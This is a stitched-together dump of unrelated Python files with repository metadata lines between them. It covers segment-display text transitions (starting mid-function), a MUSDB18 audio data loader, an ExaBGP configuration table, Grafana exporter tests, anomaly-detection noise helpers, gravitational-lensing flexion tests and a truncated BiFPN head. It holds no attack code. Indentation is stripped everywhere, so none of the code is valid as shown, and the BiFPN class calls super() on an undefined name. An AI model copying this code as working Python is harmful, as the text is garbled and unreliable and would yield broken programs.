new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
temp_list = new_display_text
temp_list.extend(transition_text)
temp_list.extend(current_display_text)
return temp_list[
self.output_length + len(self.text) - (step + 1):2 * self.output_length + len(
self.text) - (step + 1)]
if self.direction == 'left':
temp_list = current_display_text
temp_list.extend(transition_text)
temp_list.extend(new_display_text)
return temp_list[step + 1:step + 1 + self.output_length]
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class CoverTransition(TransitionBase):
"""Segment display cover transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
new_extended_display_text = new_display_text
new_extended_display_text.extend(transition_text)
if step < self.output_length:
temp_text = new_extended_display_text[-(step + 1):]
temp_text.extend(current_display_text[step + 1:])
else:
temp_text = new_display_text[-(step + 1):-(step + 1) + self.output_length]
return temp_text
if self.direction == 'left':
new_extended_display_text = transition_text
new_extended_display_text.extend(new_display_text)
if step < self.output_length:
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(new_extended_display_text[:step + 1])
else:
temp_text = new_extended_display_text[step - self.output_length + 1:step + 1]
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class UncoverTransition(TransitionBase):
"""Segment display uncover transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
current_extended_display_text = transition_text
current_extended_display_text.extend(current_display_text)
if step < len(self.text):
temp_text = current_extended_display_text[
len(self.text) - step - 1:len(self.text) - step - 1 + self.output_length]
else:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(current_extended_display_text[:self.output_length - len(temp_text)])
return temp_text
if self.direction == 'left':
current_extended_display_text = current_display_text
current_extended_display_text.extend(transition_text)
if step < len(self.text):
temp_text = current_extended_display_text[step + 1:step + 1 + self.output_length]
else:
temp_text = current_display_text[step + 1:]
temp_text.extend(new_display_text[-(self.output_length - len(temp_text)):])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class WipeTransition(TransitionBase):
"""Segment display wipe transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'right'
self.text = None
self.text_color = None
super().__init__(output_length, collapse_dots, collapse_commas, config)
if self.text is None:
self.text = ''
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return self.output_length + len(self.text)
# pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.text:
if new_colors and not self.text_color:
text_color = [new_colors[0]]
else:
text_color = self.text_color
transition_text = SegmentDisplayText.from_str(self.text, len(self.text), self.collapse_dots,
self.collapse_commas, text_color)
else:
transition_text = UncoloredSegmentDisplayText([], self.collapse_dots, self.collapse_commas)
if self.direction == 'right':
if step < len(self.text):
temp_text = transition_text[-(step + 1):]
temp_text.extend(current_display_text[step + 1:])
elif step < self.output_length:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(transition_text)
temp_text.extend(current_display_text[len(temp_text):])
else:
temp_text = new_display_text[:step - len(self.text) + 1]
temp_text.extend(transition_text[:self.output_length - len(temp_text)])
return temp_text
if self.direction == 'left':
if step < len(self.text):
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(transition_text[:step + 1])
elif step < self.output_length:
temp_text = current_display_text[:self.output_length - (step + 1)]
temp_text.extend(transition_text)
temp_text.extend(new_display_text[len(temp_text):])
elif step < self.output_length + len(self.text) - 1:
temp_text = transition_text[step - (self.output_length + len(self.text)) + 1:]
temp_text.extend(new_display_text[-(self.output_length - len(temp_text)):])
else:
temp_text = new_display_text
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
class SplitTransition(TransitionBase):
"""Segment display split transition effect."""
def __init__(self, output_length: int, collapse_dots: bool, collapse_commas: bool, config: dict) -> None:
"""Class initializer."""
self.direction = 'out'
self.mode = 'push'
super().__init__(output_length, collapse_dots, collapse_commas, config)
def get_step_count(self):
"""Return the total number of steps required for the transition."""
return int((self.output_length + 1) / 2)
# pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements
def get_transition_step(self, step: int, current_text: str, new_text: str,
current_colors: Optional[List[RGBColor]] = None,
new_colors: Optional[List[RGBColor]] = None) -> SegmentDisplayText:
"""Calculate all the steps in the transition."""
if step < 0 or step >= self.get_step_count():
raise AssertionError(STEP_OUT_OF_RANGE_ERROR)
current_display_text = SegmentDisplayText.from_str(current_text, self.output_length, self.collapse_dots,
self.collapse_commas, current_colors)
new_display_text = SegmentDisplayText.from_str(new_text, self.output_length, self.collapse_dots,
self.collapse_commas, new_colors)
if self.mode == 'push':
if self.direction == 'out':
if step == self.get_step_count() - 1:
return new_display_text
characters = int(self.output_length / 2)
split_point = characters
if characters * 2 == self.output_length:
characters -= 1
else:
split_point += 1
characters -= step
temp_text = current_display_text[split_point - characters:split_point]
temp_text.extend(new_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(current_display_text[split_point:split_point + characters])
return temp_text
if self.direction == 'in':
if step == self.get_step_count() - 1:
return new_display_text
split_point = int(self.output_length / 2)
characters = 1
if split_point * 2 < self.output_length:
split_point += 1
characters += step
temp_text = new_display_text[split_point - characters:split_point]
temp_text.extend(current_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(new_display_text[split_point:split_point + characters])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
if self.mode == 'wipe':
if self.direction == 'out':
if step == self.get_step_count() - 1:
return new_display_text
characters = int(self.output_length / 2)
if characters * 2 == self.output_length:
characters -= 1
characters -= step
temp_text = current_display_text[:characters]
temp_text.extend(new_display_text[characters:characters + (self.output_length - 2 * characters)])
temp_text.extend(current_display_text[-characters:])
return temp_text
if self.direction == 'in':
if step == self.get_step_count() - 1:
return new_display_text
temp_text = new_display_text[:step + 1]
temp_text.extend(current_display_text[step + 1:step + 1 + (self.output_length - 2 * len(temp_text))])
temp_text.extend(new_display_text[-(step + 1):])
return temp_text
raise AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)
raise AssertionError("Transition uses an unknown mode value")
|
d3net/music-source-separation/data.py
|
ishine/ai-research-code
| 199 |
64860
|
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
MUSDB18 data-iterator code for MSS.
'''
import random
import numpy as np
import musdb
from nnabla.utils.data_source import DataSource
class Compose():
"""Composes several augmentation transforms.
Args:
augmentations: list of augmentations to compose.
"""
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, audio):
for t in self.transforms:
audio = t(audio)
return audio
def _augment_gain(audio, low=0.75, high=1.25):
"""Applies a random gain between `low` and `high`"""
g = random.uniform(low, high)
return audio * g
def _augment_channelswap(audio):
"""Swap channels of stereo signals with a probability of p=0.5"""
if audio.shape[0] == 2 and random.random() < 0.5:
return np.flip(audio, 0)
else:
return audio
def load_datasources(parser, args):
"""Loads the specified dataset from commandline arguments
Returns:
train_dataset, validation_dataset
"""
parser.add_argument('--is-wav', action='store_true', default=True,
help='loads wav instead of STEMS')
parser.add_argument('--samples-per-track', type=int, default=64)
parser.add_argument(
'--source-augmentations', type=str, nargs='+',
default=['gain', 'channelswap']
)
args = parser.parse_args()
source_augmentations = Compose(
[globals()['_augment_' + aug] for aug in args.source_augmentations]
)
train_dataset = MUSDBDataSource(
source_augmentations=source_augmentations, random_track_mix=True, args=args)
return train_dataset, args
class MUSDBDataSource(DataSource):
def __init__(
self,
args,
download=False,
samples_per_track=64,
source_augmentations=lambda audio: audio,
random_track_mix=False,
dtype=np.float32,
seed=42,
rng=None
):
"""
MUSDB18 nnabla.utils.data_source that samples from the MUSDB tracks
using track and excerpts with replacement.
Parameters
----------
args : additional arguments used to add further control for
the musdb dataset initialization function.
download : boolean
automatically download 7s preview version of MUS
samples_per_track : int
sets the number of samples, yielded from each track per epoch.
Defaults to 64
source_augmentations : list[callables]
provide list of augmentation function that take a multi-channel
audio file of shape (src, samples) as input and output. Defaults to
no-augmentations (input = output)
random_track_mix : boolean
randomly mixes sources from different tracks to assemble a
custom mix. This augmenation is only applied for the train subset.
seed : int
control randomness of dataset iterations
dtype : numeric type
data type of torch output tuple x and y
"""
super(MUSDBDataSource, self).__init__(shuffle=True)
if rng is None:
rng = np.random.RandomState(seed)
self.rng = rng
random.seed(seed)
self.args = args
self.download = args.root is None
self.samples_per_track = samples_per_track
self.source_augmentations = source_augmentations
self.random_track_mix = random_track_mix
self.mus = musdb.DB(
root=args.root,
is_wav=args.is_wav,
split=None,
subsets='train',
download=download
)
print(f"Finished loading dataset with {len(self.mus.tracks)} tracks.")
self.sample_rate = 44100 # musdb has fixed sample rate
self.dtype = dtype
self._size = len(self.mus.tracks) * self.samples_per_track
self._variables = ('mixture', 'target')
self.reset()
def _get_data(self, position):
index = self._indexes[position]
audio_sources = []
target_ind = None
# select track
track = self.mus.tracks[index // self.samples_per_track]
# at training time we assemble a custom mix
if self.args.seq_dur:
for k, source in enumerate(self.mus.setup['sources']):
# memorize index of target source
if source == self.args.target:
target_ind = k
# select a random track
if self.random_track_mix:
track = random.choice(self.mus.tracks)
# set the excerpt duration
track.chunk_duration = self.args.seq_dur
# set random start index
track.chunk_start = random.uniform(
0, track.duration - self.args.seq_dur
)
# load source audio and apply time domain source_augmentations
audio = track.sources[source].audio.T
audio = self.source_augmentations(audio)
audio_sources.append(audio)
# create stem tensor of shape (source, channel, samples)
stems = np.stack(audio_sources, axis=0)
# # apply linear mix over source index=0
x = np.sum(stems, axis=0)
# get the target stem
if target_ind is not None:
y = stems[target_ind]
# assuming vocal/accompaniment scenario if target!=source
else:
vocind = list(self.mus.setup['sources'].keys()).index('vocals')
# apply time domain subtraction
y = x - stems[vocind]
# for validation and test, we deterministically yield the full musdb track
else:
# get the non-linear source mix straight from musdb
x = track.audio.T
y = track.targets[self.args.target].audio.T
return x, y
def reset(self):
if self._shuffle:
self._indexes = self.rng.permutation(self._size)
else:
self._indexes = np.arange(self._size)
super(MUSDBDataSource, self).reset()
|
src/exabgp/environment/setup.py
|
pierky/exabgp
| 1,560 |
64901
|
<reponame>pierky/exabgp<filename>src/exabgp/environment/setup.py<gh_stars>1000+
# encoding: utf-8
"""
setup.py
Created by <NAME> on 2014-12-23.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
from exabgp.environment import parsing
from exabgp.environment.environment import Env
_SPACE = {'space': ' ' * 33}
LOGGING_HELP_STDOUT = (
"""\
where logging should log
%(space)s syslog (or no setting) sends the data to the local syslog syslog
%(space)s host:<location> sends the data to a remote syslog server
%(space)s stdout sends the data to stdout
%(space)s stderr sends the data to stderr
%(space)s <filename> send the data to a file"""
% _SPACE
)
CONFIGURATION = {
'profile': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'toggle profiling of the code',
},
'file': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'profiling result file, none means stdout, no overwriting',
},
},
'pdb': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'on program fault, start pdb the python interactive debugger',
}
},
'daemon': {
'pid': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'where to save the pid if we manage it',
},
'user': {
'read': parsing.user,
'write': parsing.quote,
'value': 'nobody',
'help': 'user to run the program as',
},
'daemonize': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'should we run in the background',
},
'drop': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'drop privileges before forking processes',
},
'umask': {
'read': parsing.umask_read,
'write': parsing.umask_write,
'value': '0137',
'help': 'run daemon with this umask, governs perms of logfiles etc.',
},
},
'log': {
'enable': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'enable logging to file or syslog',
},
'level': {
'read': parsing.syslog_value,
'write': parsing.syslog_name,
'value': 'INFO',
'help': 'log message with at least the priority SYSLOG.<level>',
},
'destination': {
'read': parsing.unquote,
'write': parsing.quote,
'value': 'stdout',
'help': LOGGING_HELP_STDOUT,
},
'all': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report debug information for everything',
},
'configuration': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report command parsing',
},
'reactor': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report signal received, command reload',
},
'daemon': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report pid change, forking, ...',
},
'processes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report handling of forked processes',
},
'network': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'report networking information (TCP/IP, network state,...)',
},
'packets': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report BGP packets sent and received',
},
'rib': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report change in locally configured routes',
},
'message': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report changes in route announcement on config reload',
},
'timers': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report keepalives timers',
},
'routes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report received routes',
},
'parser': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'report BGP message parsing details',
},
'short': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'use short log format (not prepended with time,level,pid and source)',
},
},
'tcp': {
'once': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'only one tcp connection attempt per peer (for debuging scripts)',
},
'delay': {
'read': parsing.integer,
'write': parsing.nop,
'value': '0',
'help': 'start to announce route when the minutes in the hours is a modulo of this number',
},
'bind': {
'read': parsing.ip_list,
'write': parsing.quote_list,
'value': '',
'help': 'Space separated list of IPs to bind on when listening (no ip to disable)',
},
'port': {
'read': parsing.integer,
'write': parsing.nop,
'value': '179',
'help': 'port to bind on when listening',
},
'acl': {
'read': parsing.boolean,
'write': parsing.lower,
'value': '',
'help': '(experimental please do not use) unimplemented',
},
},
'bgp': {
'passive': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'ignore the peer configuration and make all peers passive',
},
'openwait': {
'read': parsing.integer,
'write': parsing.nop,
'value': '60',
'help': 'how many seconds we wait for an open once the TCP session is established',
},
},
'cache': {
'attributes': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'cache all attributes (configuration and wire) for faster parsing',
},
'nexthops': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'cache routes next-hops (deprecated: next-hops are always cached)',
},
},
'api': {
'ack': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'acknowledge api command(s) and report issues',
},
'chunk': {
'read': parsing.integer,
'write': parsing.nop,
'value': '1',
'help': 'maximum lines to print before yielding in show routes api',
},
'encoder': {
'read': parsing.api,
'write': parsing.lower,
'value': 'json',
'help': '(experimental) default encoder to use with with external API (text or json)',
},
'compact': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'shorter JSON encoding for IPv4/IPv6 Unicast NLRI',
},
'respawn': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'should we try to respawn helper processes if they dies',
},
'terminate': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'should we terminate ExaBGP if any helper process dies',
},
'cli': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'true',
'help': 'should we create a named pipe for the cli',
},
'pipename': {
'read': parsing.unquote,
'write': parsing.quote,
'value': 'exabgp',
'help': 'name to be used for the exabgp pipe',
},
},
'reactor': {
'speed': {
'read': parsing.real,
'write': parsing.nop,
'value': '1.0',
'help': 'reactor loop time\n%(space)s use only if you understand the code.' % _SPACE,
},
},
# Here for internal use
'debug': {
'pdb': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'enable python debugger on errors',
},
'memory': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'command line option --memory',
},
'configuration': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'undocumented option: raise when parsing configuration errors',
},
'selfcheck': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'does a self check on the configuration file',
},
'route': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'decode the route using the configuration',
},
'defensive': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'generate random fault in the code in purpose',
},
'rotate': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'rotate configurations file on reload (signal)',
},
},
}
# load the environment
Env.setup(CONFIGURATION)
|
tests/grafana_dashboards/test_exporter.py
|
Rvhappen/grafana-dashboard-builder
| 131 |
64906
|
# -*- coding: utf-8 -*-
# Copyright 2015-2019 grafana-dashboard-builder contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import pytest
from mock import patch, MagicMock
from grafana_dashboards.exporter import ProjectProcessor, FileExporter
__author__ = '<NAME> <<EMAIL>>'
def test_project_processor():
dashboard_processor = MagicMock()
processor = ProjectProcessor([dashboard_processor])
project = MagicMock()
context = MagicMock()
dashboard = MagicMock()
project.get_contexts.return_value = [context]
project.get_dashboards.return_value = [dashboard]
parent_context = MagicMock()
# noinspection PyTypeChecker
processor.process_projects([project], parent_context)
project.get_contexts.assert_called_once_with(parent_context)
dashboard.gen_json.assert_called_with(context)
context.expand_placeholders.assert_called_with(dashboard.name)
dashboard_processor.process_dashboard.assert_called_once_with(project.name, context.expand_placeholders(),
dashboard.gen_json())
@patch('grafana_dashboards.exporter.open', create=True)
@patch('json.dump')
@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=True)
def test_file_exporter(patch_exists, path_isdir, makedirs, json_dump, mock_file):
exporter = FileExporter('output_folder')
dashboard_data = {'some_key': 'some_value'}
exporter.process_dashboard('project_name', 'dashboard_name', dashboard_data)
json_dump.assert_called_once_with(dashboard_data, mock_file().__enter__(), sort_keys=True, indent=2,
separators=(',', ': '))
@patch('os.makedirs', side_effect=[True, OSError('testing')])
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=False)
def test_file_exporter_path_not_exist(patch_exists, path_isdir, makedirs):
exporter = FileExporter('output_folder')
dashboard_data = {'some_key': 'some_value'}
with pytest.raises(Exception) as e:
exporter.process_dashboard('project_name', 'dashboard_name', dashboard_data)
assert 'testing' in str(e.value)
@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=False)
@patch('os.path.exists', return_value=False)
def test_file_exporter_output_not_dir(patch_exists, path_isdir, makedirs):
with pytest.raises(Exception) as e:
FileExporter('output_folder')
assert "'output_folder' must be a directory" in str(e.value)
|
python/fcdd/datasets/offline_supervisor.py
|
kyungmin96/myfcdd
| 152 |
64918
|
from typing import List
import torch
from torch.utils.data.dataset import Dataset
def noise(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
nom_class: int, train_set: Dataset, gt: bool = False) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well, atm not available!
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
if gt:
raise ValueError('No GT mode for pure noise available!')
anom = generated_noise.clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
train_set.data = data
train_set.targets = targets
return train_set
def malformed_normal(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor, nom_class: int,
train_set: Dataset, gt: bool = False, brightness_threshold: float = 0.11*255) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
Unlike above, the noise images are not directly utilized as anomalies, but added to nominal samples to
create malformed normal anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well.
:param brightness_threshold: if the average brightness (averaged over color channels) of a pixel exceeds this
threshold, the noise image's pixel value is subtracted instead of added.
This avoids adding brightness values to bright pixels, where approximately no effect is achieved at all.
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
assert (norm.dim() == 4 or norm.dim() == 3) and generated_noise.shape == norm.shape
norm_dim = norm.dim()
if norm_dim == 3:
norm, generated_noise = norm.unsqueeze(1), generated_noise.unsqueeze(1) # assuming ch dim is skipped
anom = norm.clone()
# invert noise for bright regions (bright regions are considered being on average > brightness_threshold)
generated_noise = generated_noise.int()
bright_regions = norm.sum(1) > brightness_threshold * norm.shape[1]
for ch in range(norm.shape[1]):
gnch = generated_noise[:, ch]
gnch[bright_regions] = gnch[bright_regions] * -1
generated_noise[:, ch] = gnch
anom = (anom.int() + generated_noise).clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
if norm_dim == 3:
data = data.squeeze(1)
train_set.data = data
train_set.targets = targets
if gt:
gtmaps = torch.cat(
(torch.zeros_like(norm)[:, 0].float(), # 0 for nominal
(norm != anom).max(1)[0].clone().float()) # 1 for anomalous
)
if norm_dim == 4:
gtmaps = gtmaps.unsqueeze(1)
return train_set, gtmaps
else:
return train_set
|
test/test_LensModel/test_Profiles/test_flexion.py
|
heather999/lenstronomy
| 107 |
64932
|
__author__ = 'sibirrer'
from lenstronomy.LensModel.Profiles.flexion import Flexion
from lenstronomy.LensModel.lens_model import LensModel
import numpy as np
import numpy.testing as npt
import pytest
class TestExternalShear(object):
"""
tests the Gaussian methods
"""
def setup(self):
self.flex = Flexion()
g1, g2, g3, g4 = 0.01, 0.02, 0.03, 0.04
self.kwargs_lens = {'g1': g1, 'g2': g2, 'g3': g3, 'g4': g4}
def test_function(self):
x = np.array([1])
y = np.array([2])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0.135, decimal=5)
x = np.array([0])
y = np.array([0])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0, decimal=5)
x = np.array([2, 3, 4])
y = np.array([1, 1, 1])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0.09, decimal=5)
npt.assert_almost_equal(values[1], 0.18666666666666668, decimal=5)
def test_derivatives(self):
x = np.array([1])
y = np.array([2])
f_x, f_y = self.flex.derivatives(x, y, **self.kwargs_lens)
npt.assert_almost_equal(f_x[0], 0.105, decimal=5)
npt.assert_almost_equal(f_y[0], 0.15, decimal=5)
x = np.array([1, 3, 4])
y = np.array([2, 1, 1])
values = self.flex.derivatives(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0][0], 0.105, decimal=5)
npt.assert_almost_equal(values[1][0], 0.15, decimal=5)
def test_hessian(self):
x = np.array(1)
y = np.array(2)
f_xx, f_xy, f_yx, f_yy = self.flex.hessian(x, y, **self.kwargs_lens)
npt.assert_almost_equal(f_xx, 0.05, decimal=5)
npt.assert_almost_equal(f_yy, 0.11, decimal=5)
npt.assert_almost_equal(f_xy, 0.08, decimal=5)
npt.assert_almost_equal(f_xy, f_yx, decimal=8)
x = np.array([1,3,4])
y = np.array([2,1,1])
values = self.flex.hessian(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0][0], 0.05, decimal=5)
npt.assert_almost_equal(values[3][0], 0.11, decimal=5)
npt.assert_almost_equal(values[2][0], 0.08, decimal=5)
npt.assert_almost_equal(values[1][0], 0.08, decimal=5)
def test_flexion(self):
x = np.array(0)
y = np.array(2)
flex = LensModel(['FLEXION'])
f_xxx, f_xxy, f_xyy, f_yyy = flex.flexion(x, y, [self.kwargs_lens])
npt.assert_almost_equal(f_xxx, self.kwargs_lens['g1'], decimal=9)
npt.assert_almost_equal(f_xxy, self.kwargs_lens['g2'], decimal=9)
npt.assert_almost_equal(f_xyy, self.kwargs_lens['g3'], decimal=9)
npt.assert_almost_equal(f_yyy, self.kwargs_lens['g4'], decimal=9)
def test_magnification(self):
ra_0, dec_0 = 1, -1
flex = LensModel(['FLEXION'])
g1, g2, g3, g4 = 0.01, 0.02, 0.03, 0.04
kwargs = {'g1': g1, 'g2': g2, 'g3': g3, 'g4': g4, 'ra_0': ra_0, 'dec_0': dec_0}
mag = flex.magnification(ra_0, dec_0, [kwargs])
npt.assert_almost_equal(mag, 1, decimal=8)
if __name__ == '__main__':
pytest.main()
|
aw_nas/weights_manager/headers/bifpn.py
|
Harald-R/aw_nas
| 195 |
64943
|
from aw_nas.weights_manager.wrapper import BaseHead
from .classifiers import BiFPNClassifier
__all__ = ["BiFPNHead"]
class BiFPNHead(BaseHead):
NAME = "bifpn_head"
def __init__(
self,
device,
num_classes,
feature_channels,
bifpn_out_channels,
activation="swish",
num_layers=4,
has_backgroud=True,
schedule_cfg=None,
):
super(BiFPNHeader).__init__(schedule_cfg)
self.num_classes = num_classes
num_anchors = 9
self.reg = BiFPNClassifier(
bifpn_out_channels, num_anchors, 4, num_layers, activation
)
